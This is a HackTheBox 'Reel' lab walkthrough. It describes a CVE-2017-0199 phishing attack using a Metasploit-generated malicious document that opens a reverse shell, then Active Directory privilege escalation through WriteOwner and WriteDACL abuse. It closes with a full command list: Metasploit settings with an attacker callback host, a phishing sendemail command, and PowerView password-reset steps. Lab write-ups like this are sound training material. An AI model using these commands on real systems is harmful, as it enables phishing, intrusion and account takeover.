We covered HackTheBox Reel machine which is part of pwn with Metasploit track. We demonstrated CVE-2017-0199 that is related to Microsoft Office and performed privilege escalation on Active Directory through different methods including Powershell runas, WriteOwner and WriteDACL over objects. This was part of HackTheBox Reel
Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter, and highlights a technique for gaining privileges in an Active Directory environment.
Initial Enumeration
I started with an Nmap scan which revealed open ports like 21 (FTP), 22 (SSH), and 25 (SMTP). The scan also indicated the target was likely a Windows Server 2012 R2 machine.
FTP Exploitation
I logged into the FTP server using anonymous credentials (anonymous
/anonymous
). I downloaded several files from the “documents” directory.
Metadata Analysis
Using exiftool
on one of the downloaded Microsoft Office documents, I found an email address: Nico@megabank.com
.
SMTP Enumeration
Knowing there was an SMTP server and having an email address, I decided to enumerate for more valid email addresses. I created a wordlist of potential email addresses based on the discovered domain (megabank.com
and real.htb
). I used an SMTP user enumeration tool (from pentestmonkey) to verify these email addresses. Several addresses, including Nico@real.htb
and admin@real.htb
, were confirmed to exist.
Phishing Attack with Metasploit
I decided to use a known vulnerability (CVE-2017-0199) related to Microsoft Office documents. Using Metasploit, I generated a malicious RTF document that, when opened, would execute an HTA payload. This HTA payload was hosted on my machine and designed to establish a reverse shell. I configured the Metasploit module with my IP address and specific ports for the HTA server and the reverse shell listener. I then sent this malicious document as an email attachment to Nico@real.htb
using the sendemail
command-line tool.
Initial Shell and User Flag
Once Nico opened the attachment, I received a Meterpreter session. I navigated to Nico’s user directory and found the user flag and a file named cred.xml
Credential Extraction
The cred.xml
file contained stored PowerShell credentials for a user named “Tom” in a secure format. I used a PowerShell command to import and decrypt these credentials, revealing Tom’s plain-text password.
Pivoting to Tom via SSH
I used Tom’s credentials to log in via SSH. In Tom’s desktop directory, I found a “note” file and BloodHound data, hinting at Active Directory enumeration.
Active Directory Enumeration (Manual Analysis)
I explained that due to updates in BloodHound, the provided CSV files wouldn’t work directly with newer versions. I manually analyzed the CSV data (specifically acls.csv
) to find relationships and permissions. I discovered that Tom had WriteOwner
rights over an object named “Claire.”
Privilege Escalation (Tom to Claire)
Using PowerView (a PowerShell tool for Active Directory enumeration and exploitation), I leveraged Tom’s WriteOwner
permission to change Claire’s password. I then logged in as Claire using the new password.
Privilege Escalation (Claire to Backup Admins)
Analyzing the CSV data again, I found that Claire had WriteDACL
permissions over the “Backup Admins” group. I used this permission to add Claire to the “Backup Admins” group.
Final Privilege Escalation (Backup Admins to Administrator)
After logging out and back in as Claire (to update group memberships), I confirmed Claire was part of “Backup Admins.” I found that the “Backup Admins” group had full control over the Administrator’s directory. Inside a backup script (backup_script.ps1
) located in a “backup_scripts” folder, I found the plain-text password for the Administrator account.
Root Flag
I used the Administrator’s password to SSH into the machine as Administrator and retrieved the root flag.
Technical Commands
ftp <IP>
anonymous
(as FTP username)anonymous
(as FTP password)dir
cd documents
mget *
exit
(from FTP)cd real
exiftool <filename>
telnet <IP> 25
helo Nico@megabank.com
mail from: Nico@megabank.com
quit
(from telnet)nano maillist
smtp-user-enum.pl -M RCPT -U maillist -t <IP>
msfconsole
search office
use exploit/windows/fileformat/office_word_hta
options
set FILENAME invoice.doc
ifconfig
set SRVHOST <attacker_IP>
set SRVPORT 8080
set LHOST <attacker_IP>
set LPORT 4445
run
sendemail -f myname@example.com -t Nico@real.htb -u "Invoice Attached" -m "You are overdue for payment" -a /path/to/invoice.doc -s <target_IP>
sessions
sessions -i 1
pwd
(within meterpreter)shell
(within meterpreter)cd c:\users
dir
(within Windows shell)whoami
cd Nico
cd Desktop
type user.txt
type cred.xml
powershell -C "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential().Password"
ssh Tom@<target_IP>
cd Desktop
cd "Active Directory Audit"
type note.txt
powershell
. .\PowerView.ps1
Set-DomainObjectOwner -Identity Claire -OwnerIdentity Tom
Add-DomainObjectAcl -TargetIdentity Claire -PrincipalIdentity Tom -Rights ResetPassword
$pwd = ConvertTo-SecureString "P@$$WOrd123!" -AsPlainText -Force
Set-DomainUserPassword -Identity Claire -AccountPassword $pwd
exit
(from Tom’s SSH session)ssh Claire@<target_IP>
Add-NetGroupUser -UserName Claire -GroupName "Backup Admins"
net group "Backup Admins"
exit
(from Claire’s SSH session)ssh Claire@<target_IP>
(logging back in)net group "Backup Admins"
icacls C:\Users\Administrator
cd C:\Users\Administrator\Desktop
type root.txt
cd ..\backup_scripts
type backup_script.ps1
ssh Administrator@<target_IP>
cd Desktop
type root.txt